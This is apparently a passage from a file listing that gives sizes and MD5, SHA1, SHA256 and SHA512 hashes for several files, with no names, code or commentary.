SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
10KB
MD5803d0186103e47a95c54d9eaa7fa4987
SHA13f8e1e31e0da04f96adc82ec2d59ee86d07aaf8c
SHA256f44b9dbe33e8e77a281c001f233492793d77a5cf9669410614b3de367778ede8
SHA5122f1b19dca89ae6527d3f1e3b72db8d09b0b99172be943b1b55be9d94b30c2c19f6e05b639d333ecbc2dc0dc8f231cb110b17f89ea82d90c2f32bdd452e9e9449
-
Filesize
10KB
MD5881927e95526f2a939c8d2d22741cf02
SHA15549a127a2e9c54eeb79bc3de91fb197ac986143
SHA2567af309162bc4536d649b7dc65752f85871e8c4613ad41d829599f8a2fc5bc769
SHA512393a465a17c1a621191d01ae460c183cb8b3b27913b6992633281443f8be4f9d6a2ccacc6d987219115fb1b9e76e27aa6977b8951b12fddb1954f716770b17b8
-
Filesize
5.6MB
MD5eb01eece5f0887b24a1bd53183d801dc
SHA149e92aee8351e3a995d8ec95bc64d7f381dcee28
SHA256a2b1012a39662b760415ee897388c862457f4f1672897db8dee67e125bf0ad5c
SHA51283374fdc381d52b64682df5b96f02cb3d487ce12d9231ede8ee9a92ecf72fa4a0d6f91a04e5f6656cccd50f142dd44bbb08e7ecc94b647e0349064dc32a76839
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
295B
MD5580225b566aa473e16bd5f711fdef95a
SHA18741bd02b59bf9ad632874146b7b0231476d7368
SHA256da9554001d8f1a5d373b5524d90b042f88209c20092d53157f4cff3d31448846
SHA512e85e31ac2ab529a040da39e3f6132919d6837d481464f7e023e148f9658f5641e324f3c74b1bb9c8d07480f049fb5b8fbfc41152d5c83e9aaf4fd6d4210daf6e